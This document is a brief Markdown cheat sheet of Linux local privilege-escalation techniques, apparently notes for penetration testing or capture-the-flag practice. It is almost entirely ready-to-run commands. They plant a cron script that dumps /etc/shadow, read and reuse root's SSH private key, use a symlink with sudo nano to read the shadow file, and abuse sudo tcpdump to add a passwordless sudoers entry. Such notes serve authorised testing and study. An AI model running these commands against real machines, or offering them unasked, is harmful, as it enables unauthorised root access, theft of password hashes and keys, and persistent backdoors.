# Local Privilege Escalation

## SUID 

```
find / -perm -4000 2>/dev/null 
```

Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files. 

## Cron

```
# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Look at when it will run and who as
cat /etc/crontab

# Get it to write to shadow file 
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob
```

## Readable SSH 

```
# Check listing root
ls -la /root

# Check listing ssh
ls -la /root/.ssh 

# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa

# Make SSH dir
mkdir /home/<user>/.ssh

# Copy SSH into it 
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Change Perms 
chmod o-rwx /home/<user>/.ssh/id_rsa

# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost
```

## Symlink

```
# Check sudo rights 
sudo -l 

# If you have sudo rights for something like nano on a specific file
# Create symlink to link that file to shadow and then read it 
# File in example is readme.txt

 ln -s /etc/shadow readme.txt
 
 # Link to proper terminal
 export TERM=xterm

#Read file
sudo nano readme.txt
```

## TCPDump

```
# If tcpdump is in sudo list then we can abuse

# Create a file /tmp/elevate

#!/bin/bash
echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers

chmod +x /tmp/elevate
 
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

sudo bash
```